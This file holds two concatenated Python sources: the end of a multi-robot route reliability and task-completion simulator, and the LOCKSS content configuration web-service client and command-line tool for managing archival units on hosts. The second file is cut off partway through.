    stopping once a POTC or system-reliability threshold is crossed.

    Units: speeds are km/h; the raw distance matrix is in metres and is
    divided by 1000 when segment distances are computed.
    """
    def __init__(self, robot_count, robot_main_dict, initial_configuration_dict, distance_list, load_control, threshold_type, threshold_value, route_count):
        """
        :param robot_count: number of robots in the system.
        :param robot_main_dict: per-category ("Mesafe"/"Yuk"/"Hiz") dicts of
            per-robot, per-route data read from the CSV parameter files.
        :param initial_configuration_dict: per-robot defaults (hazard rate,
            starting reliability, nominal capacity, speed).
        :param distance_list: node-to-node distance matrix (metres).
        :param load_control: truthy -> scale each segment's failure rate by the
            robot's operating load ("Yuk").
        :param threshold_type: truthy -> stop on the POTC threshold,
            falsy -> stop on the system-reliability threshold.
        :param threshold_value: loop stops once the best candidate falls below this.
        :param route_count: number of candidate routes; 0 means "use every
            route defined for the last robot".
        """
        self.robot_count = robot_count
        self.initial_configuration_dict = initial_configuration_dict
        self.robot_main_dict = robot_main_dict
        self.distance_list = distance_list
        self.load_control = load_control
        self.threshold_type = threshold_type
        self.threshold_value = threshold_value
        if route_count == 0:
            # Derive the candidate-route count from the routes defined for the
            # last robot's "Mesafe" table.
            self.robot_main_dict_count = len(list(self.robot_main_dict["Mesafe"][str("robot_" + str(self.robot_count))].keys()))
            self.route_count = self.robot_main_dict_count
        else:
            self.route_count = route_count
        self.write_data_list = list()
        self.selected_route_count_list = list()
        # system_main_dict maps the iteration number (as a string key) to that
        # iteration's best-route snapshot; "Secili Rota" = selected route index.
        self.system_main_dict = dict()
        self.system_main_dict["0"] = {"POTC": 1, "Reliability": 1, "Secili Rota": 0, "Robot Reliability": list(), "Robot Time": list(), "Robot Distance": list()}
        self.initial_system_main_dict_func()
    @classmethod
    def failure_rate_calculation_using_operating_load_func(cls, failure_rate, p_value, p_0):
        """
        Scale a base failure rate by operating load:
        λ = λ0 * ((P + P0) / P0) ^ 3
        """
        result = float(failure_rate * pow(((float(p_value) + float(p_0)) / float(p_0)), 3))
        return result
    @classmethod
    def probability_of_task_completion_formula(cls, reliability, distance):
        """POTC for one segment: reliability raised to the distance travelled."""
        potc_result = float(pow(float(reliability), float(distance)))
        return potc_result
    @classmethod
    def calculate_time_func(cls, distance, speed):
        """Travel time (hours) = distance (km) / speed (km/h)."""
        time = float(distance / speed)
        return time
    @classmethod
    def reliability_exponential_func(cls, reliability_time, failure_rate):
        """
        Reliability Model = Exponential Distribution
        R = e ^ -(λt)
        """
        return float(math.exp(float(-1) * float(reliability_time) * float(failure_rate)))
    @classmethod
    def time_convert_function(cls, time_value):
        """Convert a duration in hours to an "HH:MM:SS" string."""
        seconds = float(time_value)*60*60
        minutes, seconds = divmod(seconds, 60)
        hours, minutes = divmod(minutes, 60)
        result = "%02d:%02d:%02d"%(hours,minutes,seconds)
        return result
    def initial_system_main_dict_func(self):
        """Seed iteration "0" with each robot's starting reliability and
        zeroed time/distance accumulators."""
        robot_reliability_list = list()
        robot_time_list = list()
        robot_distance_list = list()
        for item in range(self.robot_count):
            robot_reliability_list.append(self.initial_configuration_dict[str("robot_" + str(item + 1))]["Reliability"])
            robot_time_list.append(float(0.0))
            robot_distance_list.append(float(0.0))
        self.system_main_dict["0"]["Robot Reliability"] = robot_reliability_list
        self.system_main_dict["0"]["Robot Time"] = robot_time_list
        self.system_main_dict["0"]["Robot Distance"] = robot_distance_list
    def set_write_data_list_func(self):
        """
        Flatten system_main_dict into CSV-exportable rows (header row first),
        then append route-selection counts onto the first data rows.

        NOTE(review): the header and per-row layout hard-code exactly three
        robots; robot_count != 3 would raise IndexError below — confirm.
        """
        key_count = len(list(self.system_main_dict.keys()))
        # Headers (Turkish labels: Zaman=time, Mesafe=distance, Ortalama=average,
        # Rota Secilme Miktari=route selection count)
        temp_list = list()
        temp_list.append("Count")
        temp_list.append(str(""))
        temp_list.append("Secili Rota")
        temp_list.append(str(""))
        temp_list.append("POTC")
        temp_list.append(str(""))
        temp_list.append("Reliability")
        temp_list.append(str(""))
        temp_list.append("Robot Reliability ->")
        temp_list.append("Robot 1")
        temp_list.append("Robot 2")
        temp_list.append("Robot 3")
        temp_list.append(str(""))
        temp_list.append("Robot Zaman ->")
        temp_list.append("Robot 1")
        temp_list.append("Robot 2")
        temp_list.append("Robot 3")
        temp_list.append(str(""))
        temp_list.append("Robot Mesafe ->")
        temp_list.append("Robot 1")
        temp_list.append("Robot 2")
        temp_list.append("Robot 3")
        temp_list.append(str(""))
        temp_list.append("Ortalama Zaman")
        temp_list.append(str(""))
        temp_list.append("Ortalama Mesafe")
        temp_list.append(str(""))
        temp_list.append("Rota Secilme Miktari ->")
        temp_list.append("Rota Numarasi")
        temp_list.append("Secilme Miktari")
        self.write_data_list.append(temp_list)
        filter_list = list()
        # One row per recorded iteration, including the seed iteration "0".
        for item in range(key_count):
            temp_list = list()
            time_list = list()
            distance_list = list()
            temp_list.append(str(item))
            temp_list.append(str(""))
            temp_list.append(self.system_main_dict[str(item)]["Secili Rota"])
            filter_list.append(self.system_main_dict[str(item)]["Secili Rota"])
            temp_list.append(str(""))
            temp_list.append(self.system_main_dict[str(item)]["POTC"])
            temp_list.append(str(""))
            temp_list.append(self.system_main_dict[str(item)]["Reliability"])
            temp_list.append(str(""))
            temp_list.append(str(""))
            temp_list.append(self.system_main_dict[str(item)]["Robot Reliability"][0])
            temp_list.append(self.system_main_dict[str(item)]["Robot Reliability"][1])
            temp_list.append(self.system_main_dict[str(item)]["Robot Reliability"][2])
            temp_list.append(str(""))
            temp_list.append(str(""))
            temp_list.append(self.time_convert_function(self.system_main_dict[str(item)]["Robot Time"][0]))
            temp_list.append(self.time_convert_function(self.system_main_dict[str(item)]["Robot Time"][1]))
            temp_list.append(self.time_convert_function(self.system_main_dict[str(item)]["Robot Time"][2]))
            temp_list.append(str(""))
            time_list.append(self.system_main_dict[str(item)]["Robot Time"][0]) # Time Average
            time_list.append(self.system_main_dict[str(item)]["Robot Time"][1]) # Time Average
            time_list.append(self.system_main_dict[str(item)]["Robot Time"][2]) # Time Average
            temp_list.append(str(""))
            temp_list.append(self.system_main_dict[str(item)]["Robot Distance"][0])
            temp_list.append(self.system_main_dict[str(item)]["Robot Distance"][1])
            temp_list.append(self.system_main_dict[str(item)]["Robot Distance"][2])
            temp_list.append(str(""))
            distance_list.append(self.system_main_dict[str(item)]["Robot Distance"][0]) # Distance Average
            distance_list.append(self.system_main_dict[str(item)]["Robot Distance"][1]) # Distance Average
            distance_list.append(self.system_main_dict[str(item)]["Robot Distance"][2]) # Distance Average
            time_average = self.average_list_func(time_list)
            temp_list.append(self.time_convert_function(time_average))
            temp_list.append(str(""))
            distance_average = self.average_list_func(distance_list)
            temp_list.append(distance_average)
            self.write_data_list.append(temp_list)
        # Count how often each route (excluding the 0 sentinel) was selected.
        uniq_filter_list = list(dict.fromkeys(filter_list))
        for item in uniq_filter_list:
            if item != 0:
                temp = [item, filter_list.count(item)]
                self.selected_route_count_list.append(temp)
        # Append the (route, count) pairs to the first data rows, lining up
        # with the "Rota Numarasi"/"Secilme Miktari" header columns.
        for i in range(len(self.selected_route_count_list)):
            self.write_data_list[(i+1)].append(str(""))
            self.write_data_list[(i+1)].append(str(""))
            self.write_data_list[(i+1)].append(self.selected_route_count_list[i][0])
            self.write_data_list[(i+1)].append(self.selected_route_count_list[i][1])
    def average_list_func(self, temp_list):
        """Arithmetic mean of a list of numbers.

        NOTE(review): raises ZeroDivisionError for an empty list — callers
        always pass three elements.
        """
        result = 0.0
        for item in temp_list:
            result += float(item)
        list_count = len(temp_list)
        average_result = float(result / list_count)
        return average_result
    def calculate_system_reliability_func(self, robot_reliability_list):
        """System reliability = product of the robots' reliabilities."""
        system_reliability = 1
        for rlblty in robot_reliability_list:
            system_reliability *= rlblty
        return system_reliability
    def get_mesafe_and_zaman_list_func(self, temp_mesafe_list, robot_cnt):
        """
        For a waypoint index sequence, return parallel lists of segment
        distances (km) and travel times (hours) for the given robot.
        """
        list_count = len(temp_mesafe_list)
        mesafe_list = list()
        zaman_list = list()
        for count in range(list_count - 1):
            # distance_list is in metres; convert the segment to km.
            mesafe = float(self.distance_list[int(temp_mesafe_list[count])][int(temp_mesafe_list[count + 1])]) / 1000
            robot_speed_value = float(self.initial_configuration_dict[str("robot_" + str(robot_cnt))]["Speed"])
            zaman = self.calculate_time_func(mesafe, robot_speed_value)
            mesafe_list.append(mesafe)
            zaman_list.append(zaman)
        return mesafe_list, zaman_list
    def calculate_potc_and_reliability_func(self, process_count, mesafe_list, zaman_list, route_cnt, robot_cnt):
        """
        Walk one robot along one route: accumulate time and distance, decay its
        reliability per segment (optionally load-scaled), and return
        (potc, reliability, time, distance).
        """
        time_value = 0
        distance_value = 0
        # Continue from the reliability reached in the previous iteration.
        reliability_value = self.system_main_dict[str(process_count - 1)]["Robot Reliability"][robot_cnt - 1]
        potc_value = 0
        for item_count in range(len(mesafe_list)):
            selected_robot_hazard_rate = float(self.initial_configuration_dict[str("robot_" + str(robot_cnt))]["Hazard Rate"])
            selected_robot_nominal_capacity = float(self.initial_configuration_dict[str("robot_" + str(robot_cnt))]["Nominal Capacity"])
            if self.load_control:
                # Per-segment operating load ("Yuk") scales the failure rate.
                p_value = self.robot_main_dict["Yuk"][str("robot_" + str(robot_cnt))][str(route_cnt)][item_count]
                hazard_rate = self.failure_rate_calculation_using_operating_load_func(selected_robot_hazard_rate, p_value, selected_robot_nominal_capacity)
            else:
                hazard_rate = selected_robot_hazard_rate
            time_value += zaman_list[item_count]
            distance_value += mesafe_list[item_count]
            new_reliability = self.reliability_exponential_func(zaman_list[item_count], hazard_rate)
            reliability_value = reliability_value * new_reliability
            # NOTE(review): potc_value is overwritten every segment, so only
            # the last segment's POTC is returned — confirm this is intended.
            potc_value = self.probability_of_task_completion_formula(reliability_value, mesafe_list[item_count])
        return potc_value, reliability_value, time_value, distance_value
    def calculate_robot_potc_and_reliability_func(self, process_count, route_cnt):
        """
        Evaluate one candidate route for every robot; return the product of
        the robots' POTC values plus per-robot reliability/time/distance lists.
        """
        robot_potc_value = 1
        robot_reliability_value_list = list()
        robot_distance_list = list()
        robot_time_list = list()
        for j in range(self.robot_count):
            robot_cnt = int(j + 1)
            mesafe_list = list()
            zaman_list = list()
            temp_mesafe_list = list(self.robot_main_dict["Mesafe"][str("robot_" + str(robot_cnt))][str(route_cnt)])
            mesafe_list, zaman_list = self.get_mesafe_and_zaman_list_func(temp_mesafe_list, robot_cnt)
            potc_value, reliability_value, time_value, distance_value = self.calculate_potc_and_reliability_func(process_count, mesafe_list, zaman_list, route_cnt, robot_cnt)
            robot_potc_value *= potc_value
            robot_reliability_value_list.append(reliability_value)
            robot_time_list.append(time_value)
            robot_distance_list.append(distance_value)
        return robot_potc_value, robot_reliability_value_list, robot_time_list, robot_distance_list
    def calculate_main_potc_func(self):
        """
        Main loop: each iteration evaluates every candidate route, picks the
        best by POTC or system reliability (per threshold_type), records the
        snapshot, and stops once the best value drops below threshold_value.

        NOTE(review): the iteration that crosses the threshold is still
        recorded before the loop exits — confirm that is intended.
        """
        loop_control = False
        process_count = 0
        while not loop_control:
            process_count += 1
            self.system_main_dict[str(process_count)] = {"POTC": 1, "Reliability": 1, "Secili Rota": 0, "Robot Reliability": list()}
            # Index 0 of each list is a sentinel so route numbers align with
            # list indices (routes are numbered from 1).
            potc_list = list([0])
            robot_reliability_list = list([0])
            system_reliability_list = list([0])
            time_list = list([0])
            distance_list = list([0])
            for i in range(self.route_count):
                route_cnt = int(i + 1)
                robot_potc_value, robot_reliability_value_list, robot_time_list, robot_distance_list = self.calculate_robot_potc_and_reliability_func(process_count, route_cnt)
                potc_list.append(float(robot_potc_value))
                robot_reliability_list.append(robot_reliability_value_list)
                system_reliability_value = self.calculate_system_reliability_func(robot_reliability_value_list)
                system_reliability_list.append(float(system_reliability_value))
                time_list.append(robot_time_list)
                distance_list.append(robot_distance_list)
            if self.threshold_type:
                # POTC-based stopping criterion.
                best_value_index = potc_list.index(max(potc_list))
                if potc_list[best_value_index] < self.threshold_value:
                    loop_control = True
            else:
                # System-reliability-based stopping criterion.
                best_value_index = system_reliability_list.index(max(system_reliability_list))
                if system_reliability_list[best_value_index] < self.threshold_value:
                    loop_control = True
            self.system_main_dict[str(process_count)]["POTC"] = potc_list[best_value_index]
            self.system_main_dict[str(process_count)]["Reliability"] = system_reliability_list[best_value_index]
            self.system_main_dict[str(process_count)]["Secili Rota"] = best_value_index
            self.system_main_dict[str(process_count)]["Robot Reliability"] = robot_reliability_list[best_value_index]
            self.system_main_dict[str(process_count)]["Robot Time"] = time_list[best_value_index]
            self.system_main_dict[str(process_count)]["Robot Distance"] = distance_list[best_value_index]
            print("Process Count -> " + str(process_count) + " Selected Route -> " + str(best_value_index))
        self.set_write_data_list_func()
if __name__ == '__main__':
    # Script entry point: build the Qt application and show the main window.
    # The try/except wrapper is currently disabled (see the dead string below).
    # try:
    # rospy.init_node('start_potc_analysis')  # ROS node registration, disabled
    app = QtWidgets.QApplication(sys.argv)
    MAIN_WINDOW = QtWidgets.QMainWindow()
    POTC_Gui = POTC_Analysis()
    POTC_Gui.setupUi(MAIN_WINDOW)
    MAIN_WINDOW.show()
    sys.exit(app.exec_())
    # Dead code kept as a string literal (never executed; sys.exit raises first):
    """
    except Exception as err:
    print(err)
    """
|
contentconfigurationservice.py | #!/usr/bin/env python
'''A library and a command line tool to interact with the LOCKSS daemon's
content configuration service via its Web Services API.'''
__copyright__ = '''\
Copyright (c) 2000-2016, Board of Trustees of Leland Stanford Jr. University
All rights reserved.'''
__license__ = '''\
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation and/or
other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors
may be used to endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.'''
__version__ = '0.2.2'
import getpass
import itertools
from multiprocessing import Pool as ProcessPool
from multiprocessing.dummy import Pool as ThreadPool
from optparse import OptionGroup, OptionParser
import os.path
import sys
from threading import Lock, Thread
import ContentConfigurationServiceImplService_client
from wsutil import zsiauth
#
# Library
#
def add_au_by_id(host, auth, auid):
    '''
    Invokes the addAuById Web Service operation, which adds one AU (identified
    by its AUID) on one host.

    Returns a record with the fields Id (string: the AUID), IsSuccess
    (boolean), Message (string: an error message) and Name (string: the AU
    name).

    Parameters:
    - host (string): a host:port pair
    - auth (ZSI authentication object): an authentication object
    - auid (string): an AUID
    '''
    request = ContentConfigurationServiceImplService_client.addAuById()
    request.AuId = auid
    response = _ws_port(host, auth).addAuById(request)
    return response.Return
def add_aus_by_id_list(host, auth, auids):
    '''
    Invokes the addAusByIdList Web Service operation, which adds all the given
    AUs (identified by AUID) on one host.

    Returns a list of records, each with the fields Id (string: the AUID),
    IsSuccess (boolean), Message (string: an error message) and Name (string:
    the AU name).

    Parameters:
    - host (string): a host:port pair
    - auth (ZSI authentication object): an authentication object
    - auids (list of strings): a list of AUIDs
    '''
    request = ContentConfigurationServiceImplService_client.addAusByIdList()
    request.AuIds = auids
    response = _ws_port(host, auth).addAusByIdList(request)
    return response.Return
def deactivate_au_by_id(host, auth, auid):
    '''
    Invokes the deactivateAuById Web Service operation, which deactivates one
    AU (identified by its AUID) on one host.

    Returns a record with the fields Id (string: the AUID), IsSuccess
    (boolean), Message (string: an error message) and Name (string: the AU
    name).

    Parameters:
    - host (string): a host:port pair
    - auth (ZSI authentication object): an authentication object
    - auid (string): an AUID
    '''
    request = ContentConfigurationServiceImplService_client.deactivateAuById()
    request.AuId = auid
    response = _ws_port(host, auth).deactivateAuById(request)
    return response.Return
def deactivate_aus_by_id_list(host, auth, auids):
    '''
    Invokes the deactivateAusByIdList Web Service operation, which deactivates
    all the given AUs (identified by AUID) on one host.

    Returns a list of records, each with the fields Id (string: the AUID),
    IsSuccess (boolean), Message (string: an error message) and Name (string:
    the AU name).

    Parameters:
    - host (string): a host:port pair
    - auth (ZSI authentication object): an authentication object
    - auids (list of strings): a list of AUIDs
    '''
    request = ContentConfigurationServiceImplService_client.deactivateAusByIdList()
    request.AuIds = auids
    response = _ws_port(host, auth).deactivateAusByIdList(request)
    return response.Return
def delete_au_by_id(host, auth, auid):
    '''
    Invokes the deleteAuById Web Service operation, which deletes one AU
    (identified by its AUID) from one host.

    Returns a record with the fields Id (string: the AUID), IsSuccess
    (boolean), Message (string: an error message) and Name (string: the AU
    name).

    Parameters:
    - host (string): a host:port pair
    - auth (ZSI authentication object): an authentication object
    - auid (string): an AUID
    '''
    request = ContentConfigurationServiceImplService_client.deleteAuById()
    request.AuId = auid
    response = _ws_port(host, auth).deleteAuById(request)
    return response.Return
def delete_aus_by_id_list(host, auth, auids):
    '''
    Invokes the deleteAusByIdList Web Service operation, which deletes all the
    given AUs (identified by AUID) from one host.

    Returns a list of records, each with the fields Id (string: the AUID),
    IsSuccess (boolean), Message (string: an error message) and Name (string:
    the AU name).

    Parameters:
    - host (string): a host:port pair
    - auth (ZSI authentication object): an authentication object
    - auids (list of strings): a list of AUIDs
    '''
    request = ContentConfigurationServiceImplService_client.deleteAusByIdList()
    request.AuIds = auids
    response = _ws_port(host, auth).deleteAusByIdList(request)
    return response.Return
def reactivate_au_by_id(host, auth, auid):
    '''
    Invokes the reactivateAuById Web Service operation, which reactivates one
    AU (identified by its AUID) on one host.

    Returns a record with the fields Id (string: the AUID), IsSuccess
    (boolean), Message (string: an error message) and Name (string: the AU
    name).

    Parameters:
    - host (string): a host:port pair
    - auth (ZSI authentication object): an authentication object
    - auid (string): an AUID
    '''
    request = ContentConfigurationServiceImplService_client.reactivateAuById()
    request.AuId = auid
    response = _ws_port(host, auth).reactivateAuById(request)
    return response.Return
def reactivate_aus_by_id_list(host, auth, auids):
    '''
    Invokes the reactivateAusByIdList Web Service operation, which reactivates
    all the given AUs (identified by AUID) on one host.

    Returns a list of records, each with the fields Id (string: the AUID),
    IsSuccess (boolean), Message (string: an error message) and Name (string:
    the AU name).

    Parameters:
    - host (string): a host:port pair
    - auth (ZSI authentication object): an authentication object
    - auids (list of strings): a list of AUIDs
    '''
    request = ContentConfigurationServiceImplService_client.reactivateAusByIdList()
    request.AuIds = auids
    response = _ws_port(host, auth).reactivateAusByIdList(request)
    return response.Return
def _ws_port(host, auth, tracefile=None):
    '''
    Internal convenience function that builds a Web Services port for the
    content configuration service.

    Parameters:
    - host (string): a host:port pair
    - auth (ZSI authentication object): an authentication object
    - tracefile (file object): an optional trace file (default None for no trace)
    '''
    url = 'http://%s/ws/ContentConfigurationService' % (host,)
    locator = ContentConfigurationServiceImplService_client.ContentConfigurationServiceImplServiceLocator()
    # Only forward tracefile when one was supplied, preserving the locator's
    # own default otherwise.
    kwargs = {'url': url, 'auth': auth}
    if tracefile is not None:
        kwargs['tracefile'] = tracefile
    return locator.getContentConfigurationServiceImplPort(**kwargs)
#
# Command line tool
#
__tutorial__ = '''\
INTRODUCTION
This tool can be used to add, delete, activate and deactivate AUs on one or more
LOCKSS hosts. Invoking the tool consists of four parts:
- Specify the target hosts. Each occurrence of --host=HOST adds the host:port
pair HOST to the list of target hosts, and each occurrence of --hosts=HFILE adds
the host:port pairs in the file HFILE to the list of target hosts. HFILE can
contain comments, which begin at the character '#' and extend to the end of the
line. At least one target host is required. You will be prompted for a username
and password unless you pass them via --username and --password.
- Specify the target AUIDs. Likewise, each occurrence of --auid=AUID adds the
given AUID to the list of target AUIDs, and each occurrence of --auids=AFILE
adds the AUIDs in the file AFILE to the list of target AUIDs. AFILE can also
contain comments. At least one target AUID is required.
- Specify the desired operation. This is done by using exactly one of --add-aus,
--delete-aus, --deactivate-aus or --reactivate-aus.
- Optionally specify output options (see below).
OUTPUT
This tool can produce two styles of output: text output with --text-output and
tabular output with --table-output. By default, --text-output is in effect,
unless --table-output is explicitly specified.
When --text-output is in effect, unsuccessful operations are output one per line
on the console, host by host. You can additionally specify --verbose, in which
case all successful operations are also displayed host by host. The --verbose
option is only valid if --text-output is in effect.
When --table-output is in effect, a tab-separated table of unsuccessful
operations is output to the console, one row per target AU with at least one
unsuccessful operation and one column per target host.
In either output mode, the order of AUs listed (for each host in text mode, for
the whole table in tabular mode) is dictated by --sort-by-auid (AUID) or
--sort-by-name (AU name). By default, --sort-by-name is in effect, unless
--sort-by-auid is explicitly specified. Likewise, the way AUs are displayed is
governed by --list-by-auid (show the AUID), --list-by-name (show the AU name),
or --list-by-both (show the name and the AUID separated by a tab). By default,
--list-by-both is in effect unless another option in this category is specified.
The listing by name is currently just a string comparison, not a clever library
sort like in the LOCKSS daemon.
EXAMPLES
$ scripts/ws/contentconfigurationservice --host=foo.university.edu:8081 --auid=aaaaa1 --add-aus
Adds the AUID aaaaa1 to foo.university.edu:8081. Produces text output (the
default) only if the operation does not succeed.
$ scripts/ws/contentconfigurationservice --hosts=mydaemons.hosts --auids=myfile.auids --add-aus
Adds the AUIDs contained in myfile.auids to all the hosts contained in
mydaemons.hosts. Produces text output (the default) only if some operations do
not succeed. AUs are sorted by AU name (the default) and displayed as a
name-AUID pair (the default).
$ scripts/ws/contentconfigurationservice --hosts=mydaemons.hosts --auids=myfile.auids --add-aus --verbose
Adds the AUIDs contained in myfile.auids to all the hosts contained in
mydaemons.hosts. Produces text output (the default), both of successful
operations and unsuccessful operations. AUs are sorted by AU name (the default)
and displayed as a name-AUID pair (the default).
$ scripts/ws/contentconfigurationservice --hosts=mydaemons.hosts --auids=myfile.auids --add-aus --list-by-name
Adds the AUIDs contained in myfile.auids to all the hosts contained in
mydaemons.hosts. Produces text output (the default) only if some operations do
not succeed. AUs are sorted by AU name (the default) and displayed by AU name.
$ scripts/ws/contentconfigurationservice --hosts=mydaemons.hosts --auids=myfile.auids --add-aus --sort-by-auid --list-by-auid
Adds the AUIDs contained in myfile.auids to all the hosts contained in
mydaemons.hosts. Produces text output (the default) only if some operations do
not succeed. AUs are sorted by AUID and displayed by AUID.
$ scripts/ws/contentconfigurationservice --hosts=mydaemons.hosts --auids=myfile.auids --add-aus --table-output
Adds the AUIDs contained in myfile.auids to all the hosts contained in
mydaemons.hosts. If any operation does not succeed, prints a table of
unsuccessful operations where each row is an AU and each column is a host. The
rows are sorted by AU name (the default) and displayed as a name-AUID pair (the
default).'''
# NOTE: this module is Python 2 (print statements, list-returning filter()).
class _ContentConfigurationServiceOptions(object):
    '''An internal object to encapsulate options suitable for this tool.'''
    @staticmethod
    def make_parser():
        '''Static method to make a command line parser suitable for this tool.'''
        usage = '%prog {--host=HOST|--hosts=HFILE}... {--auid=AUID|--auids=AFILE}... {--add-aus|--deactivate-aus|--delete-aus|--reactivate-aus} [OPTIONS]'
        parser = OptionParser(version=__version__, description=__doc__, usage=usage)
        # Top-level options
        parser.add_option('--copyright', action='store_true', help='display copyright and exit')
        parser.add_option('--license', action='store_true', help='display software license and exit')
        parser.add_option('--tutorial', action='store_true', help='display tutorial and exit')
        # Hosts
        group = OptionGroup(parser, 'Target hosts')
        group.add_option('--host', action='append', default=list(), help='add host:port pair to list of target hosts')
        group.add_option('--hosts', action='append', default=list(), metavar='HFILE', help='add host:port pairs in HFILE to list of target hosts')
        group.add_option('--password', metavar='PASS', help='UI password (default: interactive prompt)')
        group.add_option('--username', metavar='USER', help='UI username (default: interactive prompt)')
        parser.add_option_group(group)
        # AUIDs
        group = OptionGroup(parser, 'Target AUIDs')
        group.add_option('--auid', action='append', default=list(), help='add AUID to list of target AUIDs')
        group.add_option('--auids', action='append', default=list(), metavar='AFILE', help='add AUIDs in AFILE to list of target AUIDs')
        parser.add_option_group(group)
        # Content configuration operations
        group = OptionGroup(parser, 'Content configuration operations')
        group.add_option('--add-aus', action='store_true', help='add target AUs to target hosts')
        group.add_option('--deactivate-aus', action='store_true', help='deactivate target AUs on target hosts')
        group.add_option('--delete-aus', action='store_true', help='delete target AUs from target hosts')
        group.add_option('--reactivate-aus', action='store_true', help='reactivate target AUs on target hosts')
        parser.add_option_group(group)
        # Output options
        group = OptionGroup(parser, 'Output options')
        group.add_option('--list-by-auid', action='store_true', help='list output by AUID')
        group.add_option('--list-by-both', action='store_true', help='list output by both AU name and AUID (default)')
        group.add_option('--list-by-name', action='store_true', help='list output by AU name')
        group.add_option('--sort-by-auid', action='store_true', help='sort output by AUID')
        group.add_option('--sort-by-name', action='store_true', help='sort output by AU name (default)')
        group.add_option('--table-output', action='store_true', help='produce tabular output')
        group.add_option('--text-output', action='store_true', help='produce text output (default)')
        group.add_option('--verbose', action='store_true', default=False, help='make --text-output verbose (default: %default)')
        parser.add_option_group(group)
        # Job pool
        group = OptionGroup(parser, 'Job pool')
        group.add_option('--pool-size', metavar='SIZE', type='int', default=0, help='size of the job pool, 0 for unlimited (default: %default)')
        group.add_option('--process-pool', action='store_true', help='use a process pool')
        group.add_option('--thread-pool', action='store_true', help='use a thread pool (default)')
        parser.add_option_group(group)
        # Other options
        group = OptionGroup(parser, 'Other options')
        group.add_option('--batch-size', metavar='SIZE', type='int', default=100, help='size of AUID batches (default: %default)')
        parser.add_option_group(group)
        return parser
    def __init__(self, parser, opts, args):
        '''
        Constructor. Validates the parsed options and normalizes them into
        plain attributes (hosts, auids, au_operation, output mode, pool
        settings, auth), calling parser.error() on any invalid combination.
        Parameters:
        - parser (OptionParser instance): the option parser
        - opts (Options instance): the Options instance returned by the parser
        - args (list of strings): the remaining command line arguments returned by
        the parser
        '''
        super(_ContentConfigurationServiceOptions, self).__init__()
        # Running count of unsuccessful operations, updated by _do_au_operation.
        self.errors = 0
        # Special options: print the requested text(s) and exit immediately.
        if opts.copyright: print __copyright__
        if opts.license: print __license__
        if opts.tutorial: print __tutorial__
        if any([opts.copyright, opts.license, opts.tutorial]): sys.exit()
        # General checks
        if len(args) > 0:
            parser.error('unexpected command line arguments: %s' % (' '.join(args),))
        if len(filter(None, [opts.add_aus, opts.deactivate_aus, opts.delete_aus, opts.reactivate_aus])) != 1:
            parser.error('exactly one of --add-aus, --deactivate-aus, --delete-aus, --reactivate-aus is required')
        if len(filter(None, [opts.table_output, opts.text_output])) > 1:
            parser.error('at most one of --table-output, --text-output can be specified')
        # hosts: explicit --host values plus the contents of every --hosts file
        self.hosts = opts.host[:]
        for f in opts.hosts: self.hosts.extend(_file_lines(f))
        if len(self.hosts) == 0: parser.error('at least one target host is required')
        # auids: explicit --auid values plus the contents of every --auids file
        self.auids = opts.auid[:]
        for f in opts.auids: self.auids.extend(_file_lines(f))
        if len(self.auids) == 0: parser.error('at least one target AUID is required')
        # au_operation: map the selected flag to the batch (list) library call
        if opts.add_aus: self.au_operation = add_aus_by_id_list
        elif opts.deactivate_aus: self.au_operation = deactivate_aus_by_id_list
        elif opts.delete_aus: self.au_operation = delete_aus_by_id_list
        else: self.au_operation = reactivate_aus_by_id_list
        # table_output/text_output/keysort/keydisplay/verbose
        self.table_output = opts.table_output
        self.text_output = not self.table_output
        if opts.sort_by_auid: self.keysort = _sort_by_auid
        else: self.keysort = _sort_by_name # default is --sort-by-name
        if opts.list_by_auid: self.keydisplay = _list_by_auid
        elif opts.list_by_name: self.keydisplay = _list_by_name
        else: self.keydisplay = _list_by_both # default is --list-by-both
        if self.text_output:
            self.verbose = opts.verbose
        elif opts.verbose:
            parser.error('--verbose can only be specified with --text-output')
        # pool_class/pool_size/batch_size
        if opts.process_pool and opts.thread_pool:
            parser.error('--process-pool and --thread-pool are mutually exclusive')
        self.pool_class = ProcessPool if opts.process_pool else ThreadPool
        # 0 means "unlimited": use one pool slot per target host.
        self.pool_size = opts.pool_size or len(self.hosts)
        self.batch_size = opts.batch_size
        # auth: prompt interactively for any credential not given on the command line
        u = opts.username or getpass.getpass('UI username: ')
        p = opts.password or getpass.getpass('UI password: ')
        self.auth = zsiauth(u, p)
# This is to allow pickling, so the process pool works, but this isn't great
# Have the sort and list params be enums and have keysort and keydisplay be methods?
def _sort_by_name(t): return t
def _sort_by_auid(t): return (t[1], t[0])
def _list_by_auid(t): return (t[1],) if t else ['AUID']
def _list_by_name(t): return (t[0],) if t else ['AU name']
def _list_by_both(t): return t if t else ['AU name', 'AUID']
def _do_au_operation_job(options_host):
options, host = options_host
data = dict()
errors = 0
for i in xrange(0, len(options.auids), options.batch_size):
result = options.au_operation(host, options.auth, options.auids[i:i+options.batch_size])
for r in result:
if r.IsSuccess: msg = None
else:
msg = (r.Message or '').partition(':')[0]
errors = errors + 1
data[((r.Name, r.Id), (host,))] = msg
return (host, data, errors)
def _do_au_operation(options):
    """Fan the AU operation out over all target hosts and display results.

    Results accumulate into a dict keyed by ((au_name, auid), (host,)) and
    are rendered either as per-host text sections (--text-output) or as one
